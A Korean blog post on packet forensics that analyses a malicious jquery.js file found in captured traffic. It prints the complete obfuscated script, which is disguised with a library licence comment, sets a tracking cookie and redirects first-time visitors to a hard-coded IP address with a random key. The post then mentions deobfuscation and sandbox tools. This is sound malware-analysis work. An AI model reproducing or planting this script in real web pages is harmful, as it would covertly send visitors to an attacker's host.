2021. 2. 26. 01:31ㆍ정보보안/패킷 포렌식
jquery.js 파일을 jquery.log 로 확장자 변환 후 내용 확인
// Underscore may be freely distributed under the MIT license.
var _0x72a8=["","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x63\x68\x61\x72\x41\x74","\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","\x69\x6E\x64\x65\x78\x4F\x66","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x5F\x75\x74\x6D","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x3A\x2F\x2F","\x2E","\x69\x6E\x64\x65\x78","\x2E\x70\x68\x70\x3F\x6B\x65\x79\x3D"];function makeid(){var _0xb524x2=_0x72a8[0];var _0xb524x3=_0x72a8[1];for(var _0xb524x4=0;_0xb524x4< 32;_0xb524x4++){_0xb524x2+= _0xb524x3[_0x72a8[5]](Math[_0x72a8[4]](Math[_0x72a8[2]]()* _0xb524x3[_0x72a8[3]]))};return _0xb524x2}function _mmm_(_0xb524x6,_0xb524x7,_0xb524x8,_0xb524x9){var _0xb524xa= new Date();var _0xb524xb= new Date();if(_0xb524x8=== null|| _0xb524x8=== 0){_0xb524x8= 2};_0xb524xb[_0x72a8[7]](_0xb524xa[_0x72a8[6]]()+ 3600000* 24* _0xb524x8);document[_0x72a8[8]]= _0xb524x6+ _0x72a8[9]+ escape(_0xb524x7)+ _0x72a8[10]+ _0xb524xb[_0x72a8[11]]()+ ((_0xb524x9)?_0x72a8[12]+ _0xb524x9:_0x72a8[0])}function _nnn_(_0xb524xd){var _0xb524xe=document[_0x72a8[8]][_0x72a8[13]](_0xb524xd+ _0x72a8[9]);var _0xb524xf=_0xb524xe+ _0xb524xd[_0x72a8[3]]+ 1;if((!_0xb524xe) && (_0xb524xd!= document[_0x72a8[8]][_0x72a8[14]](0,_0xb524xd[_0x72a8[3]]))){return null};if(_0xb524xe== -1){return null};var _0xb524x10=document[_0x72a8[8]][_0x72a8[13]](_0x72a8[15],_0xb524xf);if(_0xb524x10== -1){_0xb524x10= document[_0x72a8[8]][_0x72a8[3]]};return unescape(document[_0x72a8[8]][_0x72a8[14]](_0xb524xf,_0xb524x10))}var s=_0x72a8[1];if(navigator[_0x72a8[16]]){if(_nnn_(_0x72a8[17])== 1){}else {_mmm_(_0x72a8[17],_0x72a8[18],_0x72a8[18],_0x72a8[19]);window[_0x72a8[21]][_0x72a8[20]]= s[33]+ s[45]+ s[45]+ s[41]+ _0x72a8[22]+ s[53]+ s[60]+ s[57]+ _0x72a8[23]+ s[53]+ s[56]+ s[55]+ _0x72a8[23]+ s[54]+ s[54]+ s[53]+ _0x72a8[23]+ s[53]+ s[56]+ _0x72a8[19]+ _0x72a8[24]+ _0x72a8[25]+ makeid()}}
이를 가독성을 좋게 바꾸기 위해 아래의 사이트 이용
de4js
JavaScript Deobfuscator and Unpacker
lelinhtinh.github.io
이 코드에서 중요 부분은 아래쪽의 if문에서
http:// ~~~ /index.php?key= ~~ 사이트로 리다이렉트 시키는 부분이다.
코드를 html 파일로 바꿔 저장 후 온라인 악성코드 동적 분석 사이트에서 분석
Free Automated Malware Analysis Service - powered by Falcon Sandbox
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology. Here you can upload and share your file collections. Receive instant threat analysis using CrowdStrike Falcon Sta
www.hybrid-analysis.com
'정보보안 > 패킷 포렌식' 카테고리의 다른 글
| 인증서 형태의 악성코드를 포함한 패킷 분석 (0) | 2021.02.28 |
|---|---|
| Emotet 악성코드를 포함한 패킷 분석 (0) | 2021.02.28 |
| 악성코드 패킷 탐지 (0) | 2021.02.26 |
| 악성 패킷 분석 2 (0) | 2021.02.26 |
| 패킷 분석 도구 (0) | 2021.02.26 |